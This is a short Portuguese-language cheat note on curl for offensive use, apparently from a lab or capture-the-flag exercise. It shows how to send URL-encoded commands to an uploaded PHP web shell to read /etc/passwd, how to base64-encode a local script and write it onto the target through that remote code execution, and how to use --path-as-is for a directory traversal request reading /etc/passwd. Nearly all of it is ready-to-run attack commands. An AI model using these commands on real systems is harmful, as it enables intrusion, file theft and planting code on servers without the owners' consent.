Como passar parâmetros encodados usando o Curl. ```bash curl -s -G "http://172.23.1.55/arquivos/uploads/a_78aa23147cad77fb26ec76bae9c4d1fc.php" --data-urlencode "cmd=cat /etc/passwd" ``` Como criar um script na maquina de destino usando Curl + RCE: ```bash SCRIPT=$(cat /tmp/pf.py | base64 -w0) curl -s -G "http://172.23.1.55/arquivos/uploads/a_78aa23147cad77fb26ec76bae9c4d1fc.php" --data-urlencode "cmd=echo ${SCRIPT} | base64 -d > /tmp/pf.py" ``` O parâmetro `--path-as-is` no curl instrui o comando a **não normalizar o caminho da URL** antes de enviá-la ao servidor. Por padrão, o curl (assim como navegadores) processa e "limpa" caminhos de URL, resolvendo sequências como: ``` curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd ```